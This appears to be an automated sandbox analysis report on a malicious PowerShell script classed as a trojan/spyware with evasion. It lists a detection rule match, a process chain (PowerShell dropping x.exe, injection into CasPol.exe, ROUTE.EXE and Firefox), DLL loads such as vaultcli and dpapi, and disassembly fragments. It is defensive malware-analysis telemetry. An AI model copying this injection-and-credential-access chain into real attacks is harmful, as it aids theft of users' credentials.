Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: x.exe.0.dr

Static PE information: Section: ,$?"s ZLIB complexity 1.0003332189611487

Source: 11.2.SrZjbK9j4QXGHBZ.exe.32ecd14.1.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.SrZjbK9j4QXGHBZ.exe.32ecd14.1.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.ROUTE.EXE.283e310.0.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.ROUTE.EXE.283e310.0.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.firefox.exe.1a2acd14.0.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.firefox.exe.1a2acd14.0.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.0.SrZjbK9j4QXGHBZ.exe.32ecd14.1.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.0.SrZjbK9j4QXGHBZ.exe.32ecd14.1.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.ROUTE.EXE.345cd14.3.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.ROUTE.EXE.345cd14.3.raw.unpack, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@11/8@15/11

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\ebu.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0041886F push esp; retf	5_2_0041887E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00405077 push ecx; ret	5_2_00405078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0042E813 push ecx; retf	5_2_0042E866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00418024 push ss; retf	5_2_0041802B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_004019A3 push edi; iretd	5_2_004019BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_004191BA push 2DAB2D83h; iretd	5_2_004191C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00411B78 push FFFFFFA4h; iretd	5_2_00411B7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00425303 push ds; iretd	5_2_00425389
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00403480 push eax; ret	5_2_00403482
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00414558 push edi; ret	5_2_00414562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00412500 push cs; iretd	5_2_00412501
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00417D28 push FFFFFFA1h; retf	5_2_00417D2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_018E225F pushad ; ret	5_2_018E27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_018E27FA pushad ; ret	5_2_018E27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019109AD push ecx; mov dword ptr [esp], ecx	5_2_019109B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_018E283D push eax; iretd	5_2_018E2858
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E2CD9 push ss; retf	9_2_043E2CE0
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043F94C8 push ecx; retf	9_2_043F951B
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043CFD2C push ecx; ret	9_2_043CFD2D
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E3524 push esp; retf	9_2_043E3533
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E3E6F push 2DAB2D83h; iretd	9_2_043E3E7A
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043EFFB8 push ds; iretd	9_2_043F003E
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043DC82D push FFFFFFA4h; iretd	9_2_043DC832
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043DD1B5 push cs; iretd	9_2_043DD1B6
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E29DD push FFFFFFA1h; retf	9_2_043E29E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E3225F pushad ; ret	10_2_02E327F9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E327FA pushad ; ret	10_2_02E327F9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E3283D push eax; iretd	10_2_02E32858
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E609AD push ecx; mov dword ptr [esp], ecx	10_2_02E609B6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026FC053 push ebx; iretd	10_2_026FC151
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026FC107 push ebx; iretd	10_2_026FC151

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
